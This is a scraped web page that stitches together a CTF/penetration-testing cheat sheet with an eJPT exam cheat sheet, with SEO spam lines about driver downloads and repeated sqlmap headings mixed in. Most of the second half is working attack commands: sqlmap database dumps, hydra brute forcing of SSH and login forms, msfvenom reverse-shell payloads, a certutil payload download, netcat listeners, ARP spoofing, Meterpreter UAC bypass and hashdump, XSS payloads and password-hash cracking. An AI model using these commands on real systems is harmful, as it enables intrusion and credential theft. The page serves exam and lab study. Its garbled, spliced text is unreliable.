- Sqlmap Kali Linux Cheat Sheet
- Sqlmap Cheat Sheet Github
- Sqlmap Commands
- Sqlmap Tamper Cheat Sheet
- Sql Injection List
- Sqlmap Authentication Bypass Cheat Sheet
Running sqlmap yourself is not difficult. This tutorial will take you from noob to ninja with this powerful sql injection testing tool. Sqlmap is a python based tool, which means it. Sqlmap -u -dbs // to identify database name sqlmap -u -tables -D //To identify table name from given Database name sqlmap -u -columns -T -D //To identify column name from given Table name and Database name Combination sqlmap -u -dump -T -D //to dump.
System Hacking
Nmap Scanning
To scan for systems and Open Services/Ports, Use Nmap.
To scan for Vulnerabilities on system.
To scan for all ports, SYN Scan and OS detection. Hunter engineering driver download for windows 10.
To scan using inbuilt nmap scripts.
Netdiscover Scanning
To passively discover machines on the network, Use Netdiscover.
Nikto Scanning
To scan for vulnerabilities use Nikto.
WebServer is Open
If Port 80 or 443 is open, we can look for robots.txt to check for hidden flags or clues.
To find the Webserver version, Use Curl tool.
SMB is Open
If SMB has misconfigured anonymous login, Use smbclient to list shares.
If SMB Ports are open, we can look for anonymous login to mount misconfigured shares.
If we found Administrator Credentials for SMB, Access the root shell using this method.
To Extract and Mount VHD Drive Files
To search for Exploits on Metasploit by Name
Wordpress Open
If /wp-login.php is found in the Enumeration scanning, it can be Wordpress site.
To crack the login credentials for Wordpress, Use Hydra. We can use Burpsuite to capture the request parameters
To scan Wordpress site for Vulnerabilities.
To get a reverse shell using Admin Upload.
RPC Open
Ieesa laptops & desktops driver download for windows. If RPC is open, we can login using rpclient.
Powershell
To bypass execution policy
Web Hacking
Five Stages of Web Hacking
Enumeration and Reconnaissance Tools
- Whois, Nslookup, Dnsrecon, Google Fu, Dig - To passively enumerate website.
- Sublist3r - Subdomains enumeration tool.
- crt.sh - Certificate enumeration tool.
- Hunter.io - Email enumeration tool.
- Nmap, Wappalyzer, Whatweb, Builtwith, Netcat - Fingerprinting tools.
- HaveIbeenPwned - Useful for breach enumeraton.
- Use SecurityHeaders to find some misconfigured header information on target website.
- Use Zap Proxy tool to extract hidden files/directories.
- Clear Text Passwords Link
To gather information from online sources.
Scanning
Ping Sweep a network.
SYN Scan with Speed of 4 and port of common 1000 TCP.
All Port scan with All Scanning including OS, Version, Script and Traceroute.
To scan for UDP Ports (Dont scan all scans, as it takes lot of time).
Payloads
Non Staged Payload Example.
Staged Payload Example.
Shells
To use bind shell, we have to follow two steps: 1, Create a Bind Shell 2,Listen for connection.
BufferOverflow
To generate shellcode quickly, we can use python pwn library.
Gobuster with Cookie (Useful to directory traversal when cookie is needed )
SQLMAP
Redirect the HTTP Request to Burpsuite and we can see the request like this.
Now Right click and click on copy to file option.
File Hacking
Extract hidden text from PDF Files
If something is hidden on a pdf which we need to find, we can Press Ctrl + A to copy everything on the pdf and paste on notepad.If nothing is found, we can use Inkspace tool to paste the pdf and try to ungroup several times to extract any hidden flag.Else solve using pdf-uncompress tools like qpdf to convert compressed data to redeable format.
Compress File Extraction
If there is PK at the start of the file in the magic bytes, its most probably ZIP File.
To extract data from recursive zip file.
Extract hidden strings
If file is having some hidden text, we can use hexeditor or strings commands to locate the flag.
If hidden text has at the end, it is base64 encoded.
To monitor the appplication calls of a binary.
To track all Application & library calls of a program.
Cryptography
Caesar Cipher
If there is word caesar in the question or hint, it can be a substitution cipher.
If you find ! in the cipher text and cipher seems to be within certain range of Letters and appears to be transposition of a plain text, Use this website Ceasar Box to Bruteforce the hidden message.
Vigenere Cipher
To break Vigenere ciphers without knowing the key.
- Use this website Link - Bruteforce solver.
One Time Pad Cipher
To solve One Time Pad, Use OTP.
Forensics
Image File
Try file comamnd on the image to learn more information.
To extract data inside Image files.
To check for metadata of the Image files.
To search for particular string or flag in an Image file.
To extract data hidden inside an image file protected with password.
Binwalk
Binwalk helps to find data inside the image or sometimes if binwalk reports as zip Archive, we can rename the file to
Extract NTFS Filesystem
To extract ntfs file system on Linux.
Recover Files from Deleted File Systems
To Recover Files from Deleted File Systems from Remote Hosts.
Packet Capture
If usb keys are mapped with pcap, we can use this Article to extract usb keys entered: Link
JavaScript Deobfuscator
To Deobfuscate JavaScript, use Jsnice.
Password Cracking
Sqlmap Kali Linux Cheat Sheet
JOHN the ripper
If there is JOHN in the title or text or hint, its mostly reference to JOHN the ripper for bruteforce passwords/hashes.
To crack well known hashes, use Link
SAM Hashes
To get System User Hashes, we can follow this method.
Linux User Hashes
If we able to extract /etc/passwd and /etc/shadow file we can use unshadow
Hashcat
To crack the password, we can use hashcat here 500 is for format $1$ Replace it accordingly.
Privilige Escalation
Standard Scripts for Enumeration
- Linux Priv Checker - Linux Privilige Enumeration Checker.
- Pspy - Gather information on cron, proceses.
- Gtfobins - If we dont exactly remember how to use a given setuid command to get Privliges.
Sqlmap Cheat Sheet Github
Dirtycow
On older linux kernals, we can gain root access using dirtycow exploit.
Sqlmap Commands
To Use DirtyCow : Link - Maybe more specifically : Dirty.c
Sudo
To check what sudo command can the current user run with no-password.
Examples:
We can try like below
Gain More Privilige on windows system
- In meterpreter shell try
getsystem - In meterpreter shell try
backgroundand then follow rest of commands. - search suggester
- If worked fine, else Try follow rest of commands.
- Use this link: FuzzySec Win Priv Exec
- Use this method: Sherlock
- If current process doesnt own Privs, use
migrate <PID>to get more Priviliges in Meterpretor.
To get Shell on Windows use Unicorn
MYSQL with Sudo Privilage
To get Shell from MYSQL
VIM Editor with Sudo Privilage
To get Shell from VIM.
Method-1:
Method-2:
Cronjob
If some system cron is getting some url present in the file, we can replace url to get flag as below.
To monitor cronjobs, we can tail the syslogs.
More or Less Command
- If any file we found in low priv user and it contains something like this, we can execute it and minimize the size of terminal to enter the visual mode and enter
!/bin/bashto get root shell.
Improve Shell
To get the better Shell after taking control of the system.
Transfer Files from Host to Target Machine
- Use
python -m SimpleHTTPServerin the host folder. - Use Apache and put files in
/var/www/html/folder. - If Tomcat is Opened, upload the file/payload using the Admin panel.
- If wordpress is running, upload the file as plugin.
- In Windows Victim, use
certutil -urlcache -f http://<HOST_IP>/<FILE_NAME> <OUTPUT_FILE_NAME>
Tools
Reconnoitre
Sqlmap Tamper Cheat Sheet
Security tool for multithreaded information gathering and service enumeration whilst building directory structures to store results, along with writing out recommendations for further testing.
- Link
- Total Commander - multi purpose terminal for Hacking. Link : www.ghisler.com
- CTF Exploitation Framework : GitHub.com/Gallopsled/pwntools
pip install pwntools - When using GDB, we can create “~/.gdbinit” file and add this line “set disassembly-flavor intel” to make intel synatx.
- Dirbuster for enumeration web server Attacks.
- Gobuster - Used for advanced enumeration.
- 7z Password Cracking: Use tool
7z2john - SSH Password Cracking:
/usr/share/john/ssh2john.py id_rsa > output.hash
This is a Cheatsheet for eJPT exam + course.
¶Nmap
nmap -sn 10.10.10.0/24
nmap -sV -p- -iL targets -oN nmap.initial -v
nmap -A -p- -iL targets -oN nmap.aggressive -v
nmap -p
¶fPing
fping -a -g 10.10.10.0/24 2>/dev/null > targets
¶IP Route
Syntax
ip route add <Network-range> via <router-IP> dev <interface>
eg.
ip route add 10.10.10.0/24 via 10.10.11.1 dev tap0
¶John
john --wordlist=/usr/share/wordlists/rockyou.txt --format=raw-md5
unshadow passwd shadow > unshadowed.txt
john --wordlist=/usr/share/wordlists/rockyou.txt unshadowed.txt
¶dirb
dirb http://10.10.10.10/
dirb http://10.10.10.10/dir -u admin:admin
I suggest you to use dirbuster for better speed. Keep the threads at 20. Use /usr/share/wordlists/dirb/common.txt wordlist.
¶Netcat
Listening for reverse shell
nc -nvlp 1234
Sql Injection List
Banner Grabbing
nc -nv 10.10.10.10 <port>
¶SQLMap
¶Check if injection exists
sqlmap -r Post.req
sqlmap -u 'http://10.10.10.10/file.php?id=1' -p id
sqlmap -u 'http://10.10.10.10/login.php' --data='user=admin&password=admin'
¶Get database if injection Exists
sqlmap -r login.req --dbs
sqlmap -u 'http://10.10.10.10/file.php?id=1' -p id --dbs
sqlmap -u 'http://10.10.10.10/login.php' --data='user=admin&password=admin' --dbs
¶Get Tables in a Database
sqlmap -r login.req -D dbname --tables
sqlmap -u 'http://10.10.10.10/file.php?id=1' -p id -D dbname --tables
sqlmap -u 'http://10.10.10.10/login.php' --data='user=admin&password=admin' -D dbname --tables
¶Get data in a Database tables
sqlmap -r login.req -D dbname -T table_name --dump
sqlmap -u 'http://10.10.10.10/file.php?id=1' -p id -D dbname -T table_name --dump
sqlmap -u 'http://10.10.10.10/login.php' --data='user=admin&password=admin' -D dbname -T table_name --dump
¶Hydra
SSH Login Bruteforcing
hydra -v -V -u -L users.txt -P passwords.txt -t 1 -u 10.10.10.10 ssh
hydra -v -V -u -l root -P passwords.txt -t 1 -u 10.10.10.10 ssh
You can use same for FTP, just replace ssh with ftp
Sqlmap Authentication Bypass Cheat Sheet
HTTP POST Form
hydra http://10.10.10.10/ http-post-form '/login.php:user=^USER^&password=^PASS^:Incorrect credentials' -L usernames.txt -P passwords.txt -f -V
You will know which wordlists to use when the time comes
¶XSS
<script>alert(1)</script>
<ScRiPt>alert(1)</ScRiPt>
This is a great filter bypass cheatsheet
https://owasp.org/www-community/xss-filter-evasion-cheatsheet
¶msfvenom shells
JSP Java Meterpreter Reverse TCP
msfvenom -p java/jsp_shell_reverse_tcp LHOST=
PHP
msfvenom -p php/meterpreter_reverse_tcp LHOST=
cat shell.php | pbcopy && echo '<?php ' | tr -d 'n' > shell.php && pbpaste >> shell.php
¶Metasploit Meterpreter autoroute
run autoroute -s 10.10.10.0/24
¶ARPSpoof
echo 1 > /proc/sys/net/ipv4/ip_forward
arpspoof -i
arpspoof -i tap0 -t 10.100.13.37 -r 10.100.13.36
¶SMB Enumeration
Get shares, users, groups, password policy
smbclient -L //10.10.10.10/
enum4linux -U -M -S -P -G 10.10.10.10
nmap --script=smb-enum-users,smb-os-discovery,smb-enum-shares,smb-enum-groups,smb-enum-domains 10.10.10.10 -p 135,139,445 -v
nmap -p445 --script=smb-vuln-* 10.10.10.10 -v
Access Share
smbclient //10.10.10.10/share_name
¶FTP Enumeration
nmap --script=ftp-anon 10.10.10.10 -p21 -v
nmap -A -p21 10.10.10.10 -v
Login to FTP server
ftp 10.10.10.10
¶Meterpreter
ps
getuid
getpid
getsystem
ps -U SYSTEM
CHECK UAC/Privileges
run post/windows/gather/win_privs
BYPASS UAC
Background the session first
exploit/windows/local/bypassuac
set session
After PrivEsc
migrate <pid>
hashdump
¶Windows Command Line
To search for a file starting from current directory
dir /b/s '*.conf*'
dir /b/s '*.txt*'
dir /b/s '*filename*'
Check routing table
route print
netstat -r
Check Users
net users
List drives on the machine
wmic logicaldisk get Caption,Description,providername
¶Stargazers over time